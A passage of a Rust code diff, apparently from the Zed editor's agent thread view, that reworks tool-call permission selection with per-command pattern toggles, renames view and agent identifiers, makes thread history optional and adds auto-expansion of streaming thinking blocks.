- active.handle_thread_error(err, cx);
- })
- }
- } else {
- this.reset(window, cx);
- }
- this.auth_task.take()
- })
- .ok();
+ },
+ ..
+ }) = this.as_connected_mut()
+ {
+ pending_auth_method.take();
+ }
+ if let Some(active) = this.active_thread() {
+ active.update(cx, |active, cx| {
+ active.handle_thread_error(err, cx);
+ })
+ }
+ } else {
+ this.reset(window, cx);
}
- }));
+ this.auth_task.take()
+ })
+ .ok();
}
- return;
- }
+ }));
+ return;
}
configuration_view.take();
@@ -1,9 +1,14 @@
+use crate::{DEFAULT_THREAD_TITLE, SelectPermissionGranularity};
+use std::cell::RefCell;
+
use acp_thread::ContentBlock;
use cloud_api_types::{SubmitAgentThreadFeedbackBody, SubmitAgentThreadFeedbackCommentsBody};
use editor::actions::OpenExcerpts;
use crate::StartThreadIn;
+use crate::message_editor::SharedSessionCapabilities;
use gpui::{Corner, List};
+use heapless::Vec as ArrayVec;
use language_model::{LanguageModelEffortLevel, Speed};
use settings::update_settings_file;
use ui::{ButtonLike, SplitButton, SplitButtonStyle, Tab};
@@ -156,58 +161,71 @@ impl ThreadFeedbackState {
}
}
-#[derive(Default, Clone, Copy)]
-struct DiffStats {
- lines_added: u32,
- lines_removed: u32,
+pub enum AcpThreadViewEvent {
+ FirstSendRequested { content: Vec<acp::ContentBlock> },
+}
+
+impl EventEmitter<AcpThreadViewEvent> for ThreadView {}
+
+/// Tracks the user's permission dropdown selection state for a specific tool call.
+///
+/// Default (no entry in the map) means the last dropdown choice is selected,
+/// which is typically "Only this time".
+#[derive(Clone)]
+pub(crate) enum PermissionSelection {
+ /// A specific choice from the dropdown (e.g., "Always for terminal", "Only this time").
+ /// The index corresponds to the position in the `choices` list from `PermissionOptions`.
+ Choice(usize),
+ /// "Select options…" mode where individual command patterns can be toggled.
+ /// Contains the indices of checked patterns in the `patterns` list.
+ /// All patterns start checked when this mode is first activated.
+ SelectedPatterns(Vec<usize>),
}
-impl DiffStats {
- fn single_file(buffer: &Buffer, diff: &BufferDiff, cx: &App) -> Self {
- let mut stats = DiffStats::default();
- let diff_snapshot = diff.snapshot(cx);
- let buffer_snapshot = buffer.snapshot();
- let base_text = diff_snapshot.base_text();
-
- for hunk in diff_snapshot.hunks(&buffer_snapshot) {
- let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row);
- stats.lines_added += added_rows;
-
- let base_start = hunk.diff_base_byte_range.start.to_point(base_text).row;
- let base_end = hunk.diff_base_byte_range.end.to_point(base_text).row;
- let removed_rows = base_end.saturating_sub(base_start);
- stats.lines_removed += removed_rows;
+impl PermissionSelection {
+ /// Returns the choice index if a specific dropdown choice is selected,
+ /// or `None` if in per-command pattern mode.
+ pub(crate) fn choice_index(&self) -> Option<usize> {
+ match self {
+ Self::Choice(index) => Some(*index),
+ Self::SelectedPatterns(_) => None,
}
+ }
- stats
+ fn is_pattern_checked(&self, index: usize) -> bool {
+ match self {
+ Self::SelectedPatterns(checked) => checked.contains(&index),
+ _ => false,
+ }
}
- fn all_files(changed_buffers: &BTreeMap<Entity<Buffer>, Entity<BufferDiff>>, cx: &App) -> Self {
- let mut total = DiffStats::default();
- for (buffer, diff) in changed_buffers {
- let stats = DiffStats::single_file(buffer.read(cx), diff.read(cx), cx);
- total.lines_added += stats.lines_added;
- total.lines_removed += stats.lines_removed;
+ fn has_any_checked_patterns(&self) -> bool {
+ match self {
+ Self::SelectedPatterns(checked) => !checked.is_empty(),
+ _ => false,
}
- total
}
-}
-pub enum AcpThreadViewEvent {
- FirstSendRequested { content: Vec<acp::ContentBlock> },
+ fn toggle_pattern(&mut self, index: usize) {
+ if let Self::SelectedPatterns(checked) = self {
+ if let Some(pos) = checked.iter().position(|&i| i == index) {
+ checked.swap_remove(pos);
+ } else {
+ checked.push(index);
+ }
+ }
+ }
}
-impl EventEmitter<AcpThreadViewEvent> for ThreadView {}
-
pub struct ThreadView {
pub id: acp::SessionId,
pub parent_id: Option<acp::SessionId>,
pub thread: Entity<AcpThread>,
pub(crate) conversation: Entity<super::Conversation>,
- pub server_view: WeakEntity<ConnectionView>,
+ pub server_view: WeakEntity<ConversationView>,
pub agent_icon: IconName,
pub agent_icon_from_external_svg: Option<SharedString>,
- pub agent_name: SharedString,
+ pub agent_id: AgentId,
pub focus_handle: FocusHandle,
pub workspace: WeakEntity<Workspace>,
pub entry_view_state: Entity<EntryViewState>,
@@ -224,13 +242,13 @@ pub struct ThreadView {
pub last_token_limit_telemetry: Option<acp_thread::TokenUsageRatio>,
thread_feedback: ThreadFeedbackState,
pub list_state: ListState,
- pub prompt_capabilities: Rc<RefCell<PromptCapabilities>>,
- pub available_commands: Rc<RefCell<Vec<agent_client_protocol::AvailableCommand>>>,
+ pub session_capabilities: SharedSessionCapabilities,
/// Tracks which tool calls have their content/output expanded.
/// Used for showing/hiding tool call results, terminal output, etc.
pub expanded_tool_calls: HashSet<agent_client_protocol::ToolCallId>,
pub expanded_tool_call_raw_inputs: HashSet<agent_client_protocol::ToolCallId>,
pub expanded_thinking_blocks: HashSet<(usize, usize)>,
+ auto_expanded_thinking_block: Option<(usize, usize)>,
pub subagent_scroll_handles: RefCell<HashMap<agent_client_protocol::SessionId, ScrollHandle>>,
pub edits_expanded: bool,
pub plan_expanded: bool,
@@ -247,6 +265,9 @@ pub struct ThreadView {
pub is_loading_contents: bool,
pub new_server_version_available: Option<SharedString>,
pub resumed_without_history: bool,
+ pub(crate) permission_selections:
+ HashMap<agent_client_protocol::ToolCallId, PermissionSelection>,
+ pub resume_thread_metadata: Option<AgentSessionInfo>,
pub _cancel_task: Option<Task<()>>,
_save_task: Option<Task<()>>,
_draft_resolve_task: Option<Task<()>>,
@@ -264,8 +285,8 @@ pub struct ThreadView {
pub hovered_recent_history_item: Option<usize>,
pub show_external_source_prompt_warning: bool,
pub show_codex_windows_warning: bool,
- pub history: Entity<ThreadHistory>,
- pub _history_subscription: Subscription,
+ pub history: Option<Entity<ThreadHistory>>,
+ pub _history_subscription: Option<Subscription>,
}
impl Focusable for ThreadView {
fn focus_handle(&self, cx: &App) -> FocusHandle {
@@ -292,10 +313,10 @@ impl ThreadView {
parent_id: Option<acp::SessionId>,
thread: Entity<AcpThread>,
conversation: Entity<super::Conversation>,
- server_view: WeakEntity<ConnectionView>,
+ server_view: WeakEntity<ConversationView>,
agent_icon: IconName,
agent_icon_from_external_svg: Option<SharedString>,
- agent_name: SharedString,
+ agent_id: AgentId,
agent_display_name: SharedString,
workspace: WeakEntity<Workspace>,
entry_view_state: Entity<EntryViewState>,
@@ -304,12 +325,11 @@ impl ThreadView {
model_selector: Option<Entity<ModelSelectorPopover>>,
profile_selector: Option<Entity<ProfileSelector>>,
list_state: ListState,
- prompt_capabilities: Rc<RefCell<PromptCapabilities>>,
- available_commands: Rc<RefCell<Vec<agent_client_protocol::AvailableCommand>>>,
+ session_capabilities: SharedSessionCapabilities,
resumed_without_history: bool,
project: WeakEntity<Project>,
thread_store: Option<Entity<ThreadStore>>,
- history: Entity<ThreadHistory>,
+ history: Option<Entity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
initial_content: Option<AgentInitialContent>,
mut subscriptions: Vec<Subscription>,
@@ -320,8 +340,10 @@ impl ThreadView {
let placeholder = placeholder_text(agent_display_name.as_ref(), false);
- let history_subscription = cx.observe(&history, |this, history, cx| {
- this.update_recent_history_from_cache(&history, cx);
+ let history_subscription = history.as_ref().map(|h| {
+ cx.observe(h, |this, history, cx| {
+ this.update_recent_history_from_cache(&history, cx);
+ })
});
let mut should_auto_submit = false;
@@ -332,11 +354,10 @@ impl ThreadView {
workspace.clone(),
project.clone(),
thread_store,
- history.downgrade(),
+ history.as_ref().map(|h| h.downgrade()),
prompt_store,
- prompt_capabilities.clone(),
- available_commands.clone(),
- agent_name.clone(),
+ session_capabilities.clone(),
+ agent_id.clone(),
&placeholder,
editor::EditorMode::AutoHeight {
min_lines: AgentSettings::get_global(cx).message_editor_min_lines,
@@ -378,13 +399,17 @@ impl ThreadView {
let show_codex_windows_warning = cfg!(windows)
&& project.upgrade().is_some_and(|p| p.read(cx).is_local())
- && agent_name == "Codex";
+ && agent_id.as_ref() == "Codex";
let title_editor = {
let can_edit = thread.update(cx, |thread, cx| thread.can_set_title(cx));
let editor = cx.new(|cx| {
let mut editor = Editor::single_line(window, cx);
- editor.set_text(thread.read(cx).title(), window, cx);
+ if let Some(title) = thread.read(cx).title() {
+ editor.set_text(title, window, cx);
+ } else {
+ editor.set_text(DEFAULT_THREAD_TITLE, window, cx);
+ }
editor.set_read_only(!can_edit);
editor
});
@@ -428,7 +453,10 @@ impl ThreadView {
}));
}));
- let recent_history_entries = history.read(cx).get_recent_sessions(3);
+ let recent_history_entries = history
+ .as_ref()
+ .map(|h| h.read(cx).get_recent_sessions(3))
+ .unwrap_or_default();
let mut this = Self {
id,
@@ -439,7 +467,7 @@ impl ThreadView {
server_view,
agent_icon,
agent_icon_from_external_svg,
- agent_name,
+ agent_id,
workspace,
entry_view_state,
title_editor,
@@ -448,8 +476,7 @@ impl ThreadView {
model_selector,
profile_selector,
list_state,
- prompt_capabilities,
- available_commands,
+ session_capabilities,
resumed_without_history,
_subscriptions: subscriptions,
permission_dropdown_handle: PopoverMenuHandle::default(),
@@ -462,6 +489,7 @@ impl ThreadView {
expanded_tool_calls: HashSet::default(),
expanded_tool_call_raw_inputs: HashSet::default(),
expanded_thinking_blocks: HashSet::default(),
+ auto_expanded_thinking_block: None,
subagent_scroll_handles: RefCell::new(HashMap::default()),
edits_expanded: false,
plan_expanded: false,
@@ -477,6 +505,8 @@ impl ThreadView {
discarded_partial_edits: HashSet::default(),
is_loading_contents: false,
new_server_version_available: None,
+ permission_selections: HashMap::default(),
+ resume_thread_metadata: None,
_cancel_task: None,
_save_task: None,
_draft_resolve_task: None,
@@ -555,7 +585,7 @@ impl ThreadView {
self.cancel_editing(&Default::default(), window, cx);
}
MessageEditorEvent::LostFocus => {}
- MessageEditorEvent::InputAttempted(_) => {}
+ MessageEditorEvent::InputAttempted { .. } => {}
}
}
@@ -567,7 +597,7 @@ impl ThreadView {
acp_thread.connection().clone().downcast()
}
- pub(crate) fn as_native_thread(&self, cx: &App) -> Option<Entity<agent::Thread>> {
+ pub fn as_native_thread(&self, cx: &App) -> Option<Entity<agent::Thread>> {
let acp_thread = self.thread.read(cx);
self.as_native_connection(cx)?
.thread(acp_thread.session_id(), cx)
@@ -665,6 +695,7 @@ impl ThreadView {
if let Some(AgentThreadEntry::UserMessage(user_message)) =
self.thread.read(cx).entries().get(event.entry_index)
&& user_message.id.is_some()
+ && !self.is_subagent()
{
self.editing_message = Some(event.entry_index);
cx.notify();
@@ -674,6 +705,7 @@ impl ThreadView {
if let Some(AgentThreadEntry::UserMessage(user_message)) =
self.thread.read(cx).entries().get(event.entry_index)
&& user_message.id.is_some()
+ && !self.is_subagent()
{
if editor.read(cx).text(cx).as_str() == user_message.content.to_markdown(cx) {
self.editing_message = None;
@@ -683,12 +715,14 @@ impl ThreadView {
}
ViewEvent::MessageEditorEvent(_editor, MessageEditorEvent::SendImmediately) => {}
ViewEvent::MessageEditorEvent(editor, MessageEditorEvent::Send) => {
- self.regenerate(event.entry_index, editor.clone(), window, cx);
+ if !self.is_subagent() {
+ self.regenerate(event.entry_index, editor.clone(), window, cx);
+ }
}
ViewEvent::MessageEditorEvent(_editor, MessageEditorEvent::Cancel) => {
self.cancel_editing(&Default::default(), window, cx);
}
- ViewEvent::MessageEditorEvent(_editor, MessageEditorEvent::InputAttempted(_)) => {}
+ ViewEvent::MessageEditorEvent(_editor, MessageEditorEvent::InputAttempted { .. }) => {}
ViewEvent::OpenDiffLocation {
path,
position,
@@ -770,10 +804,13 @@ impl ThreadView {
}
}
}));
+ if self.parent_id.is_none() {
+ self.suppress_merge_conflict_notification(cx);
+ }
generation
}
- pub fn stop_turn(&mut self, generation: usize) {
+ pub fn stop_turn(&mut self, generation: usize, cx: &mut Context<Self>) {
if self.turn_fields.turn_generation != generation {
return;
}
@@ -784,6 +821,25 @@ impl ThreadView {
.map(|started| started.elapsed());
self.turn_fields.last_turn_tokens = self.turn_fields.turn_tokens.take();
self.turn_fields._turn_timer_task = None;
+ if self.parent_id.is_none() {
+ self.unsuppress_merge_conflict_notification(cx);
+ }
+ }
+
+ fn suppress_merge_conflict_notification(&self, cx: &mut Context<Self>) {
+ self.workspace
+ .update(cx, |workspace, cx| {
+ workspace.suppress_notification(&workspace::merge_conflict_notification_id(), cx);
+ })
+ .ok();
+ }
+
+ fn unsuppress_merge_conflict_notification(&self, cx: &mut Context<Self>) {
+ self.workspace
+ .update(cx, |workspace, _cx| {
+ workspace.unsuppress(workspace::merge_conflict_notification_id());
+ })
+ .ok();
}
pub fn update_turn_tokens(&mut self, cx: &App) {
@@ -878,8 +934,9 @@ impl ThreadView {
// Does the agent have a specific logout command? Prefer that in case they need to reset internal state.
let logout_supported = text == "/logout"
&& self
- .available_commands
- .borrow()
+ .session_capabilities
+ .read()
+ .available_commands()
.iter()
.any(|command| command.name == "logout");
if can_login && !logout_supported {
@@ -888,13 +945,13 @@ impl ThreadView {
let connection = self.thread.read(cx).connection().clone();
window.defer(cx, {
- let agent_name = self.agent_name.clone();
+ let agent_id = self.agent_id.clone();
let server_view = self.server_view.clone();
move |window, cx| {
- ConnectionView::handle_auth_required(
+ ConversationView::handle_auth_required(
server_view.clone(),
AuthRequired::new(),
- agent_name,
+ agent_id,
connection,
window,
cx,
@@ -993,24 +1050,27 @@ impl ThreadView {
let mut cx = cx.clone();
move || {
this.update(&mut cx, |this, cx| {
- this.stop_turn(generation);
+ this.stop_turn(generation, cx);
cx.notify();
})
.ok();
}
});
- if is_first_message {
+ if is_first_message && thread.read_with(cx, |thread, _cx| thread.title().is_none())? {
let text: String = contents
.iter()
.filter_map(|block| match block {
- acp::ContentBlock::Text(text_content) => Some(text_content.text.as_str()),
+ acp::ContentBlock::Text(text_content) => Some(text_content.text.clone()),
+ acp::ContentBlock::ResourceLink(resource_link) => {
+ Some(format!("@{}", resource_link.name))
+ }
_ => None,
})
.collect::<Vec<_>>()
.join(" ");
let text = text.lines().next().unwrap_or("").trim();
if !text.is_empty() {
- let title: SharedString = util::truncate_and_trailoff(text, 20).into();
+ let title: SharedString = util::truncate_and_trailoff(text, 200).into();
thread.update(cx, |thread, cx| {
thread.set_provisional_title(title, cx);
})?;
@@ -1380,6 +1440,7 @@ impl ThreadView {
&mut self,
index: usize,
inserted_text: Option<&str>,
+ cursor_offset: Option<usize>,
window: &mut Window,
cx: &mut Context<Self>,
) -> bool {
@@ -1395,6 +1456,9 @@ impl ThreadView {
if message_editor.read(cx).is_empty(cx) {
message_editor.update(cx, |editor, cx| {
editor.set_message(queued_content, window, cx);
+ if let Some(offset) = cursor_offset {
+ editor.set_cursor_offset(offset, window, cx);
+ }
if let Some(inserted_text) = inserted_text.as_deref() {
editor.insert_text(inserted_text, window, cx);
}
@@ -1403,8 +1467,16 @@ impl ThreadView {
return true;
}
+ // Adjust cursor offset accounting for existing content
+ let existing_len = message_editor.read(cx).text(cx).len();
+ let separator = "\n\n";
+
message_editor.update(cx, |editor, cx| {
- editor.append_message(queued_content, Some("\n\n"), window, cx);
+ editor.append_message(queued_content, Some(separator), window, cx);
+ if let Some(offset) = cursor_offset {
+ let adjusted_offset = existing_len + separator.len() + offset;
+ editor.set_cursor_offset(adjusted_offset, window, cx);
+ }
if let Some(inserted_text) = inserted_text.as_deref() {
editor.insert_text(inserted_text, window, cx);
}
@@ -1464,6 +1536,13 @@ impl ThreadView {
match event {
EditorEvent::BufferEdited => {
+ // We only want to set the title if the user has actively edited
+ // it. If the title editor is not focused, we programmatically
+ // changed the text, so we don't want to set the title again.
+ if !title_editor.read(cx).is_focused(window) {
+ return;
+ }
+
let new_title = title_editor.read(cx).text(cx);
thread.update(cx, |thread, cx| {
thread
@@ -1474,7 +1553,7 @@ impl ThreadView {
EditorEvent::Blurred => {
if title_editor.read(cx).text(cx).is_empty() {
title_editor.update(cx, |editor, cx| {
- editor.set_text("New Thread", window, cx);
+ editor.set_text(DEFAULT_THREAD_TITLE, window, cx);
});
}
}
@@ -1512,13 +1591,12 @@ impl ThreadView {
&mut self,
session_id: acp::SessionId,
tool_call_id: acp::ToolCallId,
- option_id: acp::PermissionOptionId,
- option_kind: acp::PermissionOptionKind,
+ outcome: SelectedPermissionOutcome,
window: &mut Window,
cx: &mut Context<Self>,
) {
self.conversation.update(cx, |conversation, cx| {
- conversation.authorize_tool_call(session_id, tool_call_id, option_id, option_kind, cx);
+ conversation.authorize_tool_call(session_id, tool_call_id, outcome, cx);
});
if self.should_be_following {
self.workspace
@@ -1581,13 +1659,76 @@ impl ThreadView {
self.authorize_tool_call(
self.id.clone(),
tool_call_id,
- option_id,
- option_kind,
+ SelectedPermissionOutcome::new(option_id, option_kind),
window,
cx,
);
}
+ pub fn handle_select_permission_granularity(
+ &mut self,
+ action: &SelectPermissionGranularity,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let tool_call_id = acp::ToolCallId::new(action.tool_call_id.clone());
+ self.permission_selections
+ .insert(tool_call_id, PermissionSelection::Choice(action.index));
+
+ cx.notify();
+ }
+
+ pub fn handle_toggle_command_pattern(
+ &mut self,
+ action: &crate::ToggleCommandPattern,
+ _window: &mut Window,
+ cx: &mut Context<Self>,
+ ) {
+ let tool_call_id = acp::ToolCallId::new(action.tool_call_id.clone());
+
+ match self.permission_selections.get_mut(&tool_call_id) {
+ Some(PermissionSelection::SelectedPatterns(checked)) => {
+ // Already in pattern mode — toggle the individual pattern.
+ if let Some(pos) = checked.iter().position(|&i| i == action.pattern_index) {
+ checked.swap_remove(pos);
+ } else {
+ checked.push(action.pattern_index);
+ }
+ }
+ _ => {
+ // First click: activate "Select options" with all patterns checked.
+ let thread = self.thread.read(cx);
+ let pattern_count = thread
+ .entries()
+ .iter()
+ .find_map(|entry| {
+ if let AgentThreadEntry::ToolCall(call) = entry {
+ if call.id == tool_call_id {
+ if let ToolCallStatus::WaitingForConfirmation { options, .. } =
+ &call.status
+ {
+ if let PermissionOptions::DropdownWithPatterns {
+ patterns,
+ ..
+ } = options
+ {
+ return Some(patterns.len());
+ }
+ }
+ }
+ }
+ None
+ })
+ .unwrap_or(0);
+ self.permission_selections.insert(
+ tool_call_id,
+ PermissionSelection::SelectedPatterns((0..pattern_count).collect()),
+ );
+ }
+ }
+ cx.notify();
+ }
+
fn authorize_pending_with_granularity(
&mut self,
is_allow: bool,
@@ -1596,38 +1737,51 @@ impl ThreadView {
) -> Option<()> {
let (session_id, tool_call_id, options) =
self.conversation.read(cx).pending_tool_call(&self.id, cx)?;
- let PermissionOptions::Dropdown(choices) = options else {
- let kind = if is_allow {
- acp::PermissionOptionKind::AllowOnce
- } else {
- acp::PermissionOptionKind::RejectOnce
- };
- return self.authorize_pending_tool_call(kind, window, cx);
+ let options = options.clone();
+ self.authorize_with_granularity(session_id, tool_call_id, &options, is_allow, window, cx)
+ }
+
+ fn authorize_with_granularity(
+ &mut self,
+ session_id: acp::SessionId,
+ tool_call_id: acp::ToolCallId,
+ options: &PermissionOptions,
+ is_allow: bool,
+ window: &mut Window,
+ cx: &mut Context<Self>,
+ ) -> Option<()> {
+ let choices = match options {
+ PermissionOptions::Dropdown(choices) => choices.as_slice(),
+ PermissionOptions::DropdownWithPatterns { choices, .. } => choices.as_slice(),
+ _ => {
+ let kind = if is_allow {
+ acp::PermissionOptionKind::AllowOnce
+ } else {
+ acp::PermissionOptionKind::RejectOnce
+ };
+ return self.authorize_pending_tool_call(kind, window, cx);
+ }
};
- // Get selected index, defaulting to last option ("Only this time")
- let selected_index = self
- .conversation
- .read(cx)
- .selected_permission_granularity(&session_id, &tool_call_id)
+ let selection = self.permission_selections.get(&tool_call_id);
+
+ // When in per-command pattern mode, use the checked patterns.
+ if let Some(PermissionSelection::SelectedPatterns(checked)) = selection {
+ if let Some(outcome) = options.build_outcome_for_checked_patterns(checked, is_allow) {
+ self.authorize_tool_call(session_id, tool_call_id, outcome, window, cx);
+ return Some(());
+ }
+ }
+
+ // Use the selected granularity choice ("Always for terminal" or "Only this time")
+ let selected_index = selection
+ .and_then(|s| s.choice_index())
.unwrap_or_else(|| choices.len().saturating_sub(1));
let selected_choice = choices.get(selected_index).or(choices.last())?;
+ let outcome = selected_choice.build_outcome(is_allow);
- let selected_option = if is_allow {
- &selected_choice.allow
- } else {
- &selected_choice.deny
- };
-
- self.authorize_tool_call(
- session_id,
- tool_call_id,
- selected_option.option_id.clone(),
- selected_option.kind,
- window,
- cx,
- );
+ self.authorize_tool_call(session_id, tool_call_id, outcome, window, cx);
Some(())
}
@@ -1757,7 +1911,7 @@ impl ThreadView {
pub fn sync_thread(
&mut self,
project: Entity<Project>,
- server_view: Entity<ConnectionView>,
+ server_view: Entity<ConversationView>,
window: &mut Window,
cx: &mut Context<Self>,
) {
@@ -2896,7 +3050,7 @@ impl ThreadView {
})
.on_click(cx.listener(move |this, _, window, cx| {
this.move_queued_message_to_main_editor(
- index, None, window, cx,
+ index, None, None, window, cx,
);
})),
)
@@ -2970,7 +3124,7 @@ impl ThreadView {
})
.on_click(cx.listener(move |this, _, window, cx| {
this.move_queued_message_to_main_editor(
- index, None, window, cx,
+ index, None, None, window, cx,
);
})),
)
@@ -3569,7 +3723,9 @@ impl ThreadView {
) -> Entity<ContextMenu> {
let message_editor = self.message_editor.clone();
let workspace = self.workspace.clone();
- let supports_images = self.prompt_capabilities.borrow().image;
+ let session_capabilities = self.session_capabilities.read();
+ let supports_images = session_capabilities.supports_images();
+ let supports_embedded_context = session_capabilities.supports_embedded_context();
let has_editor_selection = workspace
.upgrade()
@@ -3685,6 +3841,20 @@ impl ThreadView {
}
}),
)
+ .item(
+ ContextMenuEntry::new("Branch Diff")
+ .icon(IconName::GitBranch)
+ .icon_color(Color::Muted)
+ .icon_size(IconSize::XSmall)
+ .disabled(!supports_embedded_context)
+ .handler({
+ move |window, cx| {
+ message_editor.update(cx, |editor, cx| {
+ editor.insert_branch_diff_crease(window, cx);
+ });
+ }
+ }),
+ )
})
}
@@ -3692,16 +3862,16 @@ impl ThreadView {
let following = self.is_following(cx);
let tooltip_label = if following {
- if self.agent_name == "Zed Agent" {
- format!("Stop Following the {}", self.agent_name)
+ if self.agent_id.as_ref() == agent::ZED_AGENT_ID.as_ref() {
+ format!("Stop Following the {}", self.agent_id)
} else {
- format!("Stop Following {}", self.agent_name)
+ format!("Stop Following {}", self.agent_id)
}
} else {
- if self.agent_name == "Zed Agent" {
- format!("Follow the {}", self.agent_name)
+ if self.agent_id.as_ref() == agent::ZED_AGENT_ID.as_ref() {
+ format!("Follow the {}", self.agent_id)
} else {
- format!("Follow {}", self.agent_name)
+ format!("Follow {}", self.agent_id)
}
};
@@ -3788,14 +3958,12 @@ impl ThreadView {
.as_ref()
.is_some_and(|checkpoint| checkpoint.show);
- let agent_name = self.agent_name.clone();
let is_subagent = self.is_subagent();
-
- let non_editable_icon = || {
- IconButton::new("non_editable", IconName::PencilUnavailable)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .style(ButtonStyle::Transparent)
+ let is_editable = message.id.is_some() && !is_subagent;
+ let agent_name = if is_subagent {
+ "subagents".into()
+ } else {
+ self.agent_id.clone()
};
v_flex()
@@ -3816,19 +3984,16 @@ impl ThreadView {
.gap_1p5()
.w_full()
.children(rules_item)
- .children(message.id.clone().and_then(|message_id| {
- message.checkpoint.as_ref()?.show.then(|| {
+ .when(is_editable && has_checkpoint_button, |this| {
+ this.children(message.id.clone().map(|message_id| {
h_flex()
.px_3()
.gap_2()
.child(Divider::horizontal())
.child(
Button::new("restore-checkpoint", "Restore Checkpoint")
- .icon(IconName::Undo)
- .icon_size(IconSize::XSmall)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::Undo).size(IconSize::XSmall).color(Color::Muted))
.label_size(LabelSize::XSmall)
- .icon_color(Color::Muted)
.color(Color::Muted)
.tooltip(Tooltip::text("Restores all files in the project to the content they had at this point in the conversation."))
.on_click(cx.listener(move |this, _, _window, cx| {
@@ -3836,8 +4001,8 @@ impl ThreadView {
}))
)
.child(Divider::horizontal())
- })
- }))
+ }))
+ })
.child(
div()
.relative()
@@ -3853,8 +4018,11 @@ impl ThreadView {
})
.border_color(cx.theme().colors().border)
.map(|this| {
- if is_subagent {
- return this.border_dashed();
+ if !is_editable {
+ if is_subagent {
+ return this.border_dashed();
+ }
+ return this;
}
if editing && editor_focus {
return this.border_color(focus_border);
@@ -3862,12 +4030,9 @@ impl ThreadView {
if editing && !editor_focus {
return this.border_dashed()
}
- if message.id.is_some() {
- return this.shadow_md().hover(|s| {
- s.border_color(focus_border.opacity(0.8))
- });
- }
- this
+ this.shadow_md().hover(|s| {
+ s.border_color(focus_border.opacity(0.8))
+ })
})
.text_xs()
.child(editor.clone().into_any_element())
@@ -3885,20 +4050,7 @@ impl ThreadView {
.overflow_hidden();
let is_loading_contents = self.is_loading_contents;
- if is_subagent {
- this.child(
- base_container.border_dashed().child(
- non_editable_icon().tooltip(move |_, cx| {
- Tooltip::with_meta(
- "Unavailable Editing",
- None,
- "Editing subagent messages is currently not supported.",
- cx,
- )
- }),
- ),
- )
- } else if message.id.is_some() {
+ if is_editable {
this.child(
base_container
.child(
@@ -3937,26 +4089,29 @@ impl ThreadView {
this.child(
base_container
.border_dashed()
- .child(
- non_editable_icon()
- .tooltip(Tooltip::element({
- move |_, _| {
- v_flex()
- .gap_1()
- .child(Label::new("Unavailable Editing")).child(
- div().max_w_64().child(
- Label::new(format!(
- "Editing previous messages is not available for {} yet.",
- agent_name.clone()
- ))
- .size(LabelSize::Small)
- .color(Color::Muted),
- ),
- )
- .into_any_element()
- }
- }))
- )
+ .child(IconButton::new("non_editable", IconName::PencilUnavailable)
+ .icon_size(IconSize::Small)
+ .icon_color(Color::Muted)
+ .style(ButtonStyle::Transparent)
+ .tooltip(Tooltip::element({
+ let agent_name = agent_name.clone();
+ move |_, _| {
+ v_flex()
+ .gap_1()
+ .child(Label::new("Unavailable Editing"))
+ .child(
+ div().max_w_64().child(
+ Label::new(format!(
+ "Editing previous messages is not available for {} yet.",
+ agent_name
+ ))
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ ),
+ )
+ .into_any_element()
+ }
+ }))),
)
}
}),
@@ -4024,6 +4179,13 @@ impl ThreadView {
.w_full()
.text_ui(cx)
.child(self.render_message_context_menu(entry_ix, message_body, cx))
+ .when_some(
+ self.entry_view_state
+ .read(cx)
+ .entry(entry_ix)
+ .and_then(|entry| entry.focus_handle(cx)),
+ |this, handle| this.track_focus(&handle),
+ )
.into_any()
}
}
@@ -4453,7 +4615,10 @@ impl ThreadView {
.language_for_name("Markdown");
let thread = self.thread.read(cx);
- let thread_title = thread.title().to_string();
+ let thread_title = thread
+ .title()
+ .unwrap_or_else(|| DEFAULT_THREAD_TITLE.into())
+ .to_string();
let markdown = thread.to_markdown(cx);
let project = workspace.read(cx).project().clone();
@@ -4574,6 +4739,53 @@ impl ThreadView {
.into_any_element()
}
+ /// If the last entry's last chunk is a streaming thought block, auto-expand it.
+ /// Also collapses the previously auto-expanded block when a new one starts.
+ pub(crate) fn auto_expand_streaming_thought(&mut self, cx: &mut Context<Self>) {
+ let key = {
+ let thread = self.thread.read(cx);
+ if thread.status() != ThreadStatus::Generating {
+ return;
+ }
+ let entries = thread.entries();
+ let last_ix = entries.len().saturating_sub(1);
+ match entries.get(last_ix) {
+ Some(AgentThreadEntry::AssistantMessage(msg)) => match msg.chunks.last() {
+ Some(AssistantMessageChunk::Thought { .. }) => {
+ Some((last_ix, msg.chunks.len() - 1))
+ }
+ _ => None,
+ },
+ _ => None,
+ }
+ };
+
+ if let Some(key) = key {
+ if self.auto_expanded_thinking_block != Some(key) {
+ if let Some(old_key) = self.auto_expanded_thinking_block.replace(key) {
+ self.expanded_thinking_blocks.remove(&old_key);
+ }
+ self.expanded_thinking_blocks.insert(key);
+ cx.notify();
+ }
+ } else if self.auto_expanded_thinking_block.is_some() {
+ // The last chunk is no longer a thought (model transitioned to responding),
+ // so collapse the previously auto-expanded block.
+ self.collapse_auto_expanded_thinking_block();
+ cx.notify();
+ }
+ }
+
+ fn collapse_auto_expanded_thinking_block(&mut self) {
+ if let Some(key) = self.auto_expanded_thinking_block.take() {
+ self.expanded_thinking_blocks.remove(&key);
+ }
+ }
+
+ pub(crate) fn clear_auto_expand_tracking(&mut self) {
+ self.auto_expanded_thinking_block = None;
+ }
+
fn render_thinking_block(
&self,
entry_ix: usize,
@@ -4595,20 +4807,6 @@ impl ThreadView {
.entry(entry_ix)
.and_then(|entry| entry.scroll_handle_for_assistant_message_chunk(chunk_ix));
- let thinking_content = {
- div()
- .id(("thinking-content", chunk_ix))
- .when_some(scroll_handle, |this, scroll_handle| {
- this.track_scroll(&scroll_handle)
- })
- .text_ui_sm(cx)
- .overflow_hidden()
- .child(self.render_markdown(
- chunk,
- MarkdownStyle::themed(MarkdownFont::Agent, window, cx),
- ))
- };
-
v_flex()
.gap_1()
.child(
@@ -1,17 +1,17 @@
-use std::{cell::RefCell, ops::Range, rc::Rc};
+use std::ops::Range;
use super::thread_history::ThreadHistory;
use acp_thread::{AcpThread, AgentThreadEntry};
use agent::ThreadStore;
-use agent_client_protocol::{self as acp, ToolCallId};
+use agent_client_protocol::ToolCallId;
use collections::HashMap;
use editor::{Editor, EditorEvent, EditorMode, MinimapVisibility, SizingBehavior};
use gpui::{
AnyEntity, App, AppContext as _, Entity, EntityId, EventEmitter, FocusHandle, Focusable,
- ScrollHandle, SharedString, TextStyleRefinement, WeakEntity, Window,
+ ScrollHandle, TextStyleRefinement, WeakEntity, Window,
